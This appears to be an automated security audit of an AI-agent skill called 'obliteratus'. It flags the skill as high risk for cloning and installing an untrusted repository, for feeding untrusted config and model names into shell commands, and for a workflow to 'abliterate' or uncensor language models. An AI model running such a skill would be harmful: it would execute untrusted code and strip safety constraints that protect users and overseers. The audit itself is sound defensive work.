obliteratus
Fail
Audited by Gen Agent Trust Hub on Apr 27, 2026
Risk Level: HIGHEXTERNAL_DOWNLOADSREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
- [EXTERNAL_DOWNLOADS]: The skill clones a software repository from an external, non-trusted GitHub user (github.com/elder-plinius/OBLITERATUS.git). \n- [REMOTE_CODE_EXECUTION]: The skill executes 'pip install -e .' on the downloaded repository, allowing for the execution of arbitrary installation logic from a third-party source. \n- [COMMAND_EXECUTION]: (Indirect Prompt Injection Surface) The skill ingests untrusted data from model names and configuration files (e.g., templates/abliteration-config.yaml) and interpolates them into shell commands. Boundary markers: No explicit boundaries or ignore instructions are present. Capability inventory: Use of subprocess for CLI commands and Python execution. Sanitization: No input validation logic is visible in the provided files. \n- [DATA_EXFILTRATION]: The skill offers an opt-in '--contribute' telemetry flag that sends model performance data to an external researcher database. \n- [PROMPT_INJECTION]: The instructions direct the agent to 'abliterate' or 'uncensor' models, providing a workflow for bypassing LLM safety constraints. No adversarial injections targeting the agent's own system prompt were detected.
Recommendations
- AI detected serious security threats
Audit Metadata